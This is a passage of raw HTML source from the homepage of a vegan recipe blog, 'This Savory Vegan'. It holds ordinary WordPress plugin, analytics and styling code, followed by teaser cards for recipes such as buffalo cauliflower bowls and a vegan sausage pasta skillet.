{"endpoints":{"local_recs_url":"https:\/\/www.thissavoryvegan.com\/wp-admin\/admin-ajax.php?action=shareaholic_permalink_related","ajax_url":"https:\/\/www.thissavoryvegan.com\/wp-admin\/admin-ajax.php","share_counts_url":"https:\/\/www.thissavoryvegan.com\/wp-admin\/admin-ajax.php?action=shareaholic_share_counts_api"}}; //]]> </script> <script data-cfasync='false' src='//cdn.shareaholic.net/assets/pub/shareaholic.js' data-shr-siteid='ae8aa84dfdd5559d80abd635c68b4d5e' async > </script> <!-- Shareaholic Content Tags --> <meta name='shareaholic:site_name' content='This Savory Vegan' /> <meta name='shareaholic:language' content='en-US' /> <meta name='shareaholic:article_visibility' content='private' /> <meta name='shareaholic:site_id' content='ae8aa84dfdd5559d80abd635c68b4d5e' /> <meta name='shareaholic:wp_version' content='8.12.6' /> <!-- Shareaholic Content Tags End --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.thissavoryvegan.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pinterestBadge-css' href='https://www.thissavoryvegan.com/wp-content/plugins/pinterest-badge/pinterest.css' type='text/css' media='all' /> <link rel='stylesheet' id='pinterest-pin-it-button-plugin-styles-css' href='https://www.thissavoryvegan.com/wp-content/plugins/pinterest-pin-it-button/css/public.css' type='text/css' media='all' /> <link rel='stylesheet' id='wprm-public-css' href='https://www.thissavoryvegan.com/wp-content/plugins/wp-recipe-maker/dist/public-legacy.css' type='text/css' media='all' /> <link rel='stylesheet' id='foodie-pro-theme-css' href='https://www.thissavoryvegan.com/wp-content/themes/foodiepro-v320/style.css' type='text/css' media='all' /> <style id='foodie-pro-theme-inline-css' type='text/css'> a, .entry-meta a, .post-info a, .post-meta a, .site-footer a, .entry-content a{color:#43aee8;}a:hover, .entry-meta a:hover, .post-info a:hover, .post-meta a:hover, .site-footer a:hover{color:#9ddddd;}.button, button, .enews-widget input[type="submit"], a.more-link, .more-from-category a{color:#ededed;}body, .site-description, .sidebar .featured-content .entry-title{font-family:"Muli","Helvetica Neue",sans-serif;font-size:19px;}.genesis-nav-menu{font-family:"Karla","Helvetica Neue",sans-serif;}h1, h2, h3, h4, h5, h6, .site-title, .entry-title, .widgettitle{font-family:"Karla","Helvetica Neue",sans-serif;font-weight:900;}.entry-title{font-family:"Karla","Helvetica Neue",sans-serif;font-size:21px;}.button, .button-secondary, button, input[type="button"], input[type="reset"], input[type="submit"], a.more-link, .more-from-category a{font-family:"Karla","Helvetica Neue",sans-serif;} </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.thissavoryvegan.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.thissavoryvegan.com/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://www.thissavoryvegan.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mailerlite_forms.css-css' href='https://www.thissavoryvegan.com/wp-content/plugins/official-mailerlite-sign-up-forms/assets/css/mailerlite_forms.css' type='text/css' media='all' /> <link rel='stylesheet' id='wprm-template-css' href='https://www.thissavoryvegan.com/wp-content/plugins/wp-recipe-maker/templates/recipe/legacy/simple/simple.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-css' href='//fonts.googleapis.com/css?family=Muli%3Aregular%2Citalic%2C300%2C300italic%7CKarla%3Aregular%2Citalic%2C700%2C700italic%26subset%3Dlatin%2C' type='text/css' media='all' /> <link rel='stylesheet' id='simple-social-icons-font-css' href='https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/css/style.css' type='text/css' media='all' /> <!-- Inline jetpack_facebook_likebox --> <style id='jetpack_facebook_likebox-inline-css' type='text/css'> .widget_facebook_likebox { overflow: hidden; } </style> <link rel='stylesheet' id='jetpack_css-css' href='https://www.thissavoryvegan.com/wp-content/plugins/jetpack/css/jetpack.css' type='text/css' media='all' /> <link rel='stylesheet' id='slider_styles-css' href='https://www.thissavoryvegan.com/wp-content/plugins/genesis-responsive-slider/assets/style.css' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/pinterest-badge/pinterest_wp.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var ai_front = {"wp_ai":"5.2+2.4.17","insertion_before":"BEFORE","insertion_after":"AFTER","insertion_prepend":"PREPEND CONTENT","insertion_append":"APPEND CONTENT","insertion_replace_content":"REPLACE CONTENT","insertion_replace_element":"REPLACE ELEMENT","cancel":"Cancel","use":"Use","add":"Add","parent":"Parent","cancel_element_selection":"Cancel element selection","select_parent_element":"Select parent element","css_selector":"CSS selector","use_current_selector":"Use current selector","element":"ELEMENT","path":"PATH","selector":"SELECTOR","visible":"VISIBLE","hidden":"HIDDEN"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/ad-inserter/includes/js/ai-jquery.js'></script> <script type='text/javascript'> function ai_insert(insertion,selector,insertion_code){if(selector.indexOf(":eq")!=-1)var elements=jQuery(selector);else var elements=document.querySelectorAll(selector);Array.prototype.forEach.call(elements,function(element,index){var ai_debug=typeof ai_debugging!=="undefined";if(element.hasAttribute("id"))selector_string="#"+element.getAttribute("id");else if(element.hasAttribute("class"))selector_string="."+element.getAttribute("class").replace(new RegExp(" ","g"),".");else selector_string="";var template= document.createElement("div");template.innerHTML=insertion_code;var ai_selector_counter=template.getElementsByClassName("ai-selector-counter")[0];if(ai_selector_counter!=null)ai_selector_counter.innerText=index+1;var ai_debug_name_ai_main=template.getElementsByClassName("ai-debug-name ai-main")[0];if(ai_debug_name_ai_main!=null){var insertion_name="";if(insertion=="before")insertion_name=ai_front.insertion_before;else if(insertion=="after")insertion_name=ai_front.insertion_after;else if(insertion== "prepend")insertion_name=ai_front.insertion_prepend;else if(insertion=="append")insertion_name=ai_front.insertion_append;else if(insertion=="replace-content")insertion_name=ai_front.insertion_replace_content;else if(insertion=="replace-element")insertion_name=ai_front.insertion_replace_element;ai_debug_name_ai_main.innerText=insertion_name+" "+selector+" ("+element.tagName.toLowerCase()+selector_string+")"}var range=document.createRange();var fragment=range.createContextualFragment(template.innerHTML); if(insertion=="before")element.parentNode.insertBefore(fragment,element);else if(insertion=="after")element.parentNode.insertBefore(fragment,element.nextSibling);else if(insertion=="prepend")element.insertBefore(fragment,element.firstChild);else if(insertion=="append")element.insertBefore(fragment,null);else if(insertion=="replace-content")element.innerHTML=template.innerHTML;else if(insertion=="replace-element"){element.parentNode.insertBefore(fragment,element);element.parentNode.removeChild(element)}if(ai_debug)console.log("AI INSERT", insertion,selector,"("+element.tagName.toLowerCase()+selector_string+")")})} function ai_insert_viewport(element){function hasClass(element,cls){if(element==null)return false;if(element.classList)return element.classList.contains(cls);else return(" "+element.className+" ").indexOf(" "+cls+" ")>-1}function addClass(element,cls){if(element==null)return;if(element.classList)element.classList.add(cls);else element.className+=" "+cls}function removeClass(element,cls){if(element==null)return;if(element.classList)element.classList.remove(cls);else element.className=element.className.replace(new RegExp("(^|\\b)"+ cls.split(" ").join("|")+"(\\b|$)","gi")," ")}var ai_debug=typeof ai_debugging!=="undefined";if(ai_debug)console.log("AI VIEWPORT INSERTION class:",element.getAttribute("class"));var visible=!!(element.offsetWidth||element.offsetHeight||element.getClientRects().length);var block=element.getAttribute("data-block");if(visible){var insertion_code=element.getAttribute("data-code");var insertion_type=element.getAttribute("data-insertion");var selector=element.getAttribute("data-selector");if(insertion_code!= null)if(insertion_type!=null&&selector!=null){var selector_exists=document.querySelectorAll(selector).length;if(ai_debug)console.log("AI VIEWPORT VISIBLE: block",block,insertion_type,selector,selector_exists?"":"NOT FOUND");if(selector_exists){ai_insert(insertion_type,selector,b64d(insertion_code));removeClass(element,"ai-viewports")}}else{if(ai_debug)console.log("AI VIEWPORT VISIBLE: block",block);var range=document.createRange();var fragment=range.createContextualFragment(b64d(insertion_code)); element.parentNode.insertBefore(fragment,element.nextSibling);removeClass(element,"ai-viewports")}}else{if(ai_debug)console.log("AI VIEWPORT NOT VISIBLE: block",block);var debug_bar=element.previousElementSibling;if(hasClass(debug_bar,"ai-debug-bar")&&hasClass(debug_bar,"ai-debug-script")){removeClass(debug_bar,"ai-debug-script");addClass(debug_bar,"ai-debug-viewport-invisible")}removeClass(element,"ai-viewports")}} function b64e(str){return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g,function toSolidBytes(match,p1){return String.fromCharCode("0x"+p1)}))}function b64d(str){return decodeURIComponent(atob(str).split("").map(function(c){return"%"+("00"+c.charCodeAt(0).toString(16)).slice(-2)}).join(""))}; </script> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/wp-retina-2x/js/picturefill.min.js'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/themes/genesis/lib/js/html5shiv.min.js'></script> <![endif]--> <script type='text/javascript' src='https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/svgxuse.js'></script> <link rel='https://api.w.org/' href='https://www.thissavoryvegan.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.thissavoryvegan.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.thissavoryvegan.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/7Q2e5' /> <style type="text/css"> .enews .screenread { height: 1px; left: -1000em; overflow: hidden; position: absolute; top: -1000em; width: 1px; } </style><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-86025529-1', 'auto'); ga('send', 'pageview'); </script> <meta name="p:domain_verify" content="7127f190073043e69364c065a964163d"/> <!--AdThrive JW Collapsible Player Header--> <script src="https://content.jwplatform.com/libraries/N6KNOkRy.js"></script> <!-- MailerLite Universal --> <script> (function (m, a, i, l, e, r) { m['MailerLiteObject'] = e; function f() { var c = {a: arguments, q: []}; var r = this.push(c); return "number" != typeof r ? r : f.bind(c.q); } f.q = f.q || []; m[e] = m[e] || f.bind(f.q); m[e].q = m[e].q || f.q; r = a.createElement(i); var _ = a.getElementsByTagName(i)[0]; r.async = 1; r.src = l + '?' + (~~(new Date().getTime() / 10000000)); _.parentNode.insertBefore(r, _); })(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml'); var ml_account = ml('accounts', '1050594', 't2y8k3y2m0', 'load'); </script> <!-- End MailerLite Universal --> <style type="text/css"> html body .wprm-recipe-container { color: #333333; } html body .wprm-recipe-container a.wprm-recipe-print { color: #333333; } html body .wprm-recipe-container a.wprm-recipe-print:hover { color: #333333; } html body .wprm-recipe-container .wprm-recipe { background-color: #ffffff; } html body .wprm-recipe-container .wprm-recipe { border-color: #aaaaaa; } html body .wprm-recipe-container .wprm-recipe-tastefully-simple .wprm-recipe-time-container { border-color: #aaaaaa; } html body .wprm-recipe-container .wprm-recipe .wprm-color-border { border-color: #aaaaaa; } html body .wprm-recipe-container a { color: #000000; } html body .wprm-recipe-container .wprm-recipe-tastefully-simple .wprm-recipe-name { color: #000000; } html body .wprm-recipe-container .wprm-recipe-tastefully-simple .wprm-recipe-header { color: #000000; } html body .wprm-recipe-container h1 { color: #000000; } html body .wprm-recipe-container h2 { color: #000000; } html body .wprm-recipe-container h3 { color: #000000; } html body .wprm-recipe-container h4 { color: #000000; } html body .wprm-recipe-container h5 { color: #000000; } html body .wprm-recipe-container h6 { color: #000000; } html body .wprm-recipe-container svg path { fill: #343434; } html body .wprm-recipe-container svg rect { fill: #343434; } html body .wprm-recipe-container svg polygon { stroke: #343434; } html body .wprm-recipe-container .wprm-rating-star-full svg polygon { fill: #343434; } html body .wprm-recipe-container .wprm-recipe .wprm-color-accent { background-color: #2c3e50; } html body .wprm-recipe-container .wprm-recipe .wprm-color-accent { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe .wprm-color-accent a.wprm-recipe-print { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe .wprm-color-accent a.wprm-recipe-print:hover { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-header { background-color: #2c3e50; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-header { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-meta > div { background-color: #3498db; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-meta > div { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-meta > div a.wprm-recipe-print { color: #ffffff; } html body .wprm-recipe-container .wprm-recipe-colorful .wprm-recipe-meta > div a.wprm-recipe-print:hover { color: #ffffff; } .wprm-rating-star svg polygon { stroke: #343434; } .wprm-rating-star.wprm-rating-star-full svg polygon { fill: #343434; } html body .wprm-recipe-container .wprm-recipe-instruction-image { text-align: left; } html body .wprm-recipe-container li.wprm-recipe-ingredient { list-style-type: disc; } html body .wprm-recipe-container li.wprm-recipe-instruction { list-style-type: decimal; } .wprm-comment-rating svg path, .comment-form-wprm-rating svg path { fill: #343434; } .comment-form-wprm-rating .rated svg polygon { fill: #343434; } .wprm-comment-rating svg polygon, .comment-form-wprm-rating svg polygon { stroke: #343434; }</style> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><link rel="pingback" href="https://www.thissavoryvegan.com/xmlrpc.php" /> <link rel="icon" href="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2016/10/cropped-Savory-Vegan-1.jpg?fit=270%2C270&#038;ssl=1" /> <style type='text/css'> .ai-viewport-3 { display: none !important;} .ai-viewport-2 { display: none !important;} .ai-viewport-1 { display: inherit !important;} .ai-viewport-0 { display: none !important;} @media (min-width: 768px) and (max-width: 979px) { .ai-viewport-1 { display: none !important;} .ai-viewport-2 { display: inherit !important;} } @media (max-width: 767px) { .ai-viewport-1 { display: none !important;} .ai-viewport-3 { display: inherit !important;} } </style> </head> <body data-rsssl=1 class="home blog custom-header header-image header-full-width content-sidebar foodie-pro" itemscope itemtype="https://schema.org/WebPage"><div id="before-header" class="before-header"><section id="enews-ext-6" class="widget enews-widget"><div class="widget-wrap"><div class="enews"><h3 class="widgettitle widget-title">SUBSCRIBE</h3> <p>Get your FREE eCookBook!</p> <form id="subscribeenews-ext-6" action="https://app.mailerlite.com/webforms/submit/o5b5z6" method="post" target="_blank" onsubmit="if ( subbox1.value == 'First Name') { subbox1.value = ''; } if ( subbox2.value == 'Last Name') { subbox2.value = ''; }" name="enews-ext-6"> <label for="subbox1" class="screenread">First Name</label><input type="text" id="subbox1" class="enews-subbox" value="" placeholder="First Name" name="fields[name]" /> <label for="subbox" class="screenread">E-Mail Address</label><input type="email" value="" id="subbox" placeholder="E-Mail Address" name="fields[email]" required="required" /> <input type="hidden" name="ml-submit" value="1" /> <input type="submit" value="Go" id="subbutton" /> </form> </div></div></section> </div> <!-- end .before-header --><div class="site-container"><ul class="genesis-skip-link"><li><a href="#genesis-nav-primary" class="screen-reader-shortcut"> Skip to primary navigation</a></li><li><a href="#genesis-content" class="screen-reader-shortcut"> Skip to content</a></li><li><a href="#genesis-sidebar-primary" class="screen-reader-shortcut"> Skip to primary sidebar</a></li></ul><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><h1 class="site-title" itemprop="headline"><a href="https://www.thissavoryvegan.com/" title="This Savory Vegan" ><img src="https://www.thissavoryvegan.com/wp-content/uploads/2019/02/cropped-Logo.jpg" title="This Savory Vegan" alt="This Savory Vegan" nopin="nopin" /></a></h1></div></div></header><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement" id="genesis-nav-primary"><div class="wrap"><ul id="menu-main-menu" class="menu genesis-nav-menu menu-primary"><li id="menu-item-28" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28"><a href="https://www.thissavoryvegan.com/recipes/" itemprop="url"><span itemprop="name">RECIPES</span></a></li> <li id="menu-item-4128" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4128"><a href="https://www.thissavoryvegan.com/category/weekly-dinner-plans/" itemprop="url"><span itemprop="name">DINNER PLANS</span></a></li> <li id="menu-item-35" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35"><a target="_blank" rel="noopener noreferrer" href="https://www.youtube.com/channel/UC_CXwtQX_GHS64nAH-CVr0A#new_tab" itemprop="url"><span itemprop="name">VIDEOS</span></a></li> <li id="menu-item-31" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31"><a href="https://www.thissavoryvegan.com/about/" itemprop="url"><span itemprop="name">ABOUT</span></a> <ul class="sub-menu"> <li id="menu-item-2532" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2532"><a href="https://www.thissavoryvegan.com/about/privacy-policy/" itemprop="url"><span itemprop="name">Privacy Policy</span></a></li> </ul> </li> <li id="menu-item-230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230"><a href="https://www.thissavoryvegan.com/contact-me/" itemprop="url"><span itemprop="name">CONTACT</span></a></li> <li id="foodie-social" class="foodie-social menu-item"><aside class="widget-area"><h2 class="genesis-sidebar-title screen-reader-text">Navigation Menu: Social Icons</h2><section id="simple-social-icons-2" class="widget simple-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-email"><a href="mailto:[email protected]" ><svg role="img" class="social-email" aria-labelledby="social-email-2"><title id="social-email-2">Email</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-email"></use></svg></a></li><li class="ssi-facebook"><a href="https://www.facebook.com/thissavoryvegan" ><svg role="img" class="social-facebook" aria-labelledby="social-facebook-2"><title id="social-facebook-2">Facebook</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-instagram"><a href="https://instagram.com/thissavoryvegan/" ><svg role="img" class="social-instagram" aria-labelledby="social-instagram-2"><title id="social-instagram-2">Instagram</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/thissavoryvegan/" ><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-2"><title id="social-pinterest-2">Pinterest</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="https://twitter.com/thissavoryvegan" ><svg role="img" class="social-twitter" aria-labelledby="social-twitter-2"><title id="social-twitter-2">Twitter</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li><li class="ssi-youtube"><a href="https://www.youtube.com/channel/UC_CXwtQX_GHS64nAH-CVr0A" ><svg role="img" class="social-youtube" aria-labelledby="social-youtube-2"><title id="social-youtube-2">YouTube</title><use xlink:href="https://www.thissavoryvegan.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-youtube"></use></svg></a></li></ul></div></section> </aside></li><li id="foodie-search" class="foodie-search menu-item"><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://www.thissavoryvegan.com/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cdd83c401c9d6.56777715">Search</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cdd83c401c9d6.56777715" placeholder="Search"><input class="search-form-submit" type="submit" value="Search"><meta itemprop="target" content="https://www.thissavoryvegan.com/?s={s}"></form></li></ul></div></nav><div class="site-inner"><div class="content-sidebar-wrap"><main class="content" id="genesis-content"><div class="widget-area home-middle"><section id="featured-post-3" class="widget featured-content featuredpost"><div class="widget-wrap"><h3 class="widgettitle widget-title">The Newest of The New</h3> <article class="simple-grid one-half odd first post-4346 post type-post status-publish format-standard has-post-thumbnail category-bowls category-entrees category-recipes entry"><a href="https://www.thissavoryvegan.com/buffalo-cauliflower-quinoa-bowls-vegan-tahini-ranch/" title="Buffalo Cauliflower Quinoa Bowls with Vegan Tahini Ranch" class="alignnone"><img width="680" height="900" src="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/buffalo-cauliflower-quinoa-bowls-tahini-ranch-4.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="These Buffalo Cauliflower Quinoa Bowls with Vegan Tahini Ranch are the perfect healthy lunch or dinner. Great meal prep idea for busy weekdays | ThisSavoryVegan.com #thissavoryvegan #vegan #buffalocauliflower" itemprop="image" srcset="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/buffalo-cauliflower-quinoa-bowls-tahini-ranch-4.jpg?resize=680%2C900&amp;ssl=1 680w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/buffalo-cauliflower-quinoa-bowls-tahini-ranch-4.jpg?resize=340%2C450&amp;ssl=1 340w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/buffalo-cauliflower-quinoa-bowls-tahini-ranch-4.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/buffalo-cauliflower-quinoa-bowls-tahini-ranch-4.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/buffalo-cauliflower-quinoa-bowls-vegan-tahini-ranch/">Buffalo Cauliflower Quinoa Bowls with Vegan Tahini Ranch</a></h2></header><div class="entry-content"><p>These Buffalo Cauliflower Quinoa Bowls with Vegan Tahini Ranch are the perfect healthy lunch or dinner. Great meal prep idea for busy ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/buffalo-cauliflower-quinoa-bowls-vegan-tahini-ranch/">Read More</a></p></p></div></article><article class="simple-grid one-half post-4333 post type-post status-publish format-standard has-post-thumbnail category-recipes category-snacks-side-dishes entry"><a href="https://www.thissavoryvegan.com/the-best-baked-buffalo-cauliflower/" title="The Best Baked Buffalo Cauliflower" class="alignnone"><img width="680" height="900" src="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="Flavored from the inside out and perfectly crispy, this really is The Best Baked Buffalo Cauliflower out there. Served with vegan ranch! | ThisSavoryVegan.com #thissavoryvegan #buffalocauliflower #vegan" itemprop="image" srcset="https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=680%2C900&amp;ssl=1 680w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?resize=340%2C450&amp;ssl=1 340w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i1.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/best-buffalo-cauliflower.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/the-best-baked-buffalo-cauliflower/">The Best Baked Buffalo Cauliflower</a></h2></header><div class="entry-content"><p>Flavored from the inside out and perfectly crispy, this really is The Best Baked Buffalo Cauliflower out there. Served with vegan ranch! The ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/the-best-baked-buffalo-cauliflower/">Read More</a></p></p></div></article><article class="simple-grid one-half odd first post-4320 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-pasta category-recipes category-skillet-meals entry"><a href="https://www.thissavoryvegan.com/creamy-vegan-sausage-pasta-skillet/" title="Creamy Vegan Sausage &#038; Pasta Skillet" class="alignnone"><img width="680" height="900" src="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=680%2C900&amp;ssl=1" class="entry-image attachment-post" alt="The perfect weeknight dinner, this Creamy Vegan Sausage &amp; Pasta Skillet is ready in less than 30 minutes and requires just a few ingredients! | ThisSavoryVegan.com #thissavoryvegan #veganpasta #skilletmeal" itemprop="image" srcset="https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=680%2C900&amp;ssl=1 680w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?resize=340%2C450&amp;ssl=1 340w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?zoom=2&amp;resize=680%2C900&amp;ssl=1 1360w, https://i0.wp.com/www.thissavoryvegan.com/wp-content/uploads/2019/05/creamy-vegan-sausage-pasta-skillet-2.jpg?zoom=3&amp;resize=680%2C900&amp;ssl=1 2040w" sizes="(max-width: 680px) 100vw, 680px" /></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.thissavoryvegan.com/creamy-vegan-sausage-pasta-skillet/">Creamy Vegan Sausage &#038; Pasta Skillet</a></h2></header><div class="entry-content"><p>The perfect weeknight dinner, this Creamy Vegan Sausage &amp; Pasta Skillet is ready in less than 30 minutes and requires just a few ...</p><p><a class="more-link" href="https://www.thissavoryvegan.com/creamy-vegan-sausage-pasta-skillet/">Read More</a></p></p></div></article><article class="simple-grid one-half post-4308 post type-post status-publish format-standard has-post-thumbnail category-30-minutes-or-less-dinners category-entrees category-pasta category-recipes entry"><a href="https://www.thissavoryvegan.com/vegan-sun-dried-tomato-pesto-with-spring-peas/" 